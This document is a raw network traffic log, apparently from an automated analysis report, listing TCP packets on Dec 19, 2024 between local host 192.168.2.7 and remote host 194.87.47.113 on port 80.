Dec 19, 2024 08:47:32.526690960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.527393103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.527412891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.527457952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.528280020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.528362036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.528675079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.529026985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.529120922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.529885054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.529903889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.529967070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.530131102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.530548096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.530565023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.530607939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.531361103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.531403065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.531487942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.532155037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.532196045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.532740116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.532910109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.532926083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.532946110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.533751965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.533824921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.534373045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.534559011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.534575939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.534617901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.535218000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.535268068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.535732985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.535988092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.536084890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.536592960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.536818981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.536864042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.537358046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.537616968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.537667036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.538224936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.538479090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.538495064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.538532019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.539169073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.539221048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.539488077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.540007114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.540024996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.540083885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.540842056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.540858984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.540899038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.541539907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.541577101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.542131901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.542365074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.542382002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.542423010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.543112993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.543215036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.691714048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.691862106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.691953897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.692209959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.692349911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.692399025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.692670107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.693025112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.693084002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.693414927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.693697929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.693763018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.694458961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.694627047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.694679022 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.694953918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.695346117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.695427895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.695667982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.696034908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.696114063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.696383953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.697280884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.697336912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.697504997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.697876930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.697962046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.698211908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.698584080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.698638916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.698892117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.699321032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.699409008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.699588060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.700113058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.700192928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.700272083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.700917959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.700978994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.701066971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.701782942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.701860905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.701931953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.704668999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.704745054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.704816103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.705159903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.705200911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.705513000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.705881119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.705924988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.706192017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.706609964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.706758976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.706839085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.707123041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.707164049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.707674980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.707818985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.707863092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.708425045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.708625078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.708687067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.709232092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.709429026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.709484100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.710076094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.710201979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.710279942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.710922003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.711060047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.711102009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.711594105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.711781979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.711833954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.712377071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.712572098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.712615967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.713170052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.713363886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.713402987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.714004040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.714178085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.714221001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.714755058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.714951992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.715001106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.715579987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.715761900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.715883970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.716373920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.716546059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.716598988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.717123032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.717353106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.717428923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.717909098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.718123913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.718187094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.718728065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.718914986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.718992949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.719571114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.719697952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.719743013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.720315933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.720489979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.720560074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.721167088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.721426964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.721504927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.722034931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.722157001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.722218990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.722660065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.722856045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.722922087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.723500967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.723751068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.723833084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.724386930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.724623919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.724695921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.725086927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.725325108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.725389004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.725833893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.726174116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.726280928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.726726055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.726980925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.727121115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.727432966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.727617979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.727689028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.728306055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.728467941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.728523016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.729120016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.729393959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.729585886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.730066061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.730220079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.730318069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.730776072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.730997086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.731060028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.731426954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.731601954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.731648922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.732211113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.732397079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.732500076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.733048916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.733150005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.733195066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.733731985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.733988047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.734085083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.734529972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.734735012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.734791994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.735363960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.778407097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.883934975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.884095907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.884269953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.884439945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.884797096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.884870052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.885443926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.885593891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.885668993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.885924101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.886605978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.886645079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.886699915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.886862993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.886910915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.887173891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.887564898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.887605906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.887864113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.888410091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.888503075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.888520002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.889516115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.889575958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.889702082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.890047073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.890090942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.890408993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.890736103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.890809059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.891082048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.891518116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.891572952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.891834021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.892304897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.892374992 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.892465115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.893090963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.893151999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.893227100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.893856049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.893930912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.893984079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.896673918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.896791935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.896878004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.897172928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.897243977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.897361040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.897701979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.897766113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.898041010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.898422003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.898591042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.898844004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.899099112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.899194956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.899616003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.899801970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.899888039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.900399923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.900588989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.900738001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.901191950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.901392937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.901458025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.902003050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.902168989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.902215958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.902754068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.902967930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.903023005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.903565884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.903774023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.903831005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.904364109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.904578924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.904656887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.905153036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.905361891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.905436039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.905936003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.906158924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.906224966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.906764030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.906965017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.907059908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.907573938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.907728910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.907788038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.908346891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.908535004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.908693075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.909264088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.909444094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.909482002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.909893036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.910146952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.910192013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.910686016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.910897970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.910939932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.911525011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.911736965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.911791086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.912399054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.912586927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.912642956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.913059950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.913261890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.913311005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.913839102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.914050102 CET	80	49707	194.87.47.113	192.168.2.7
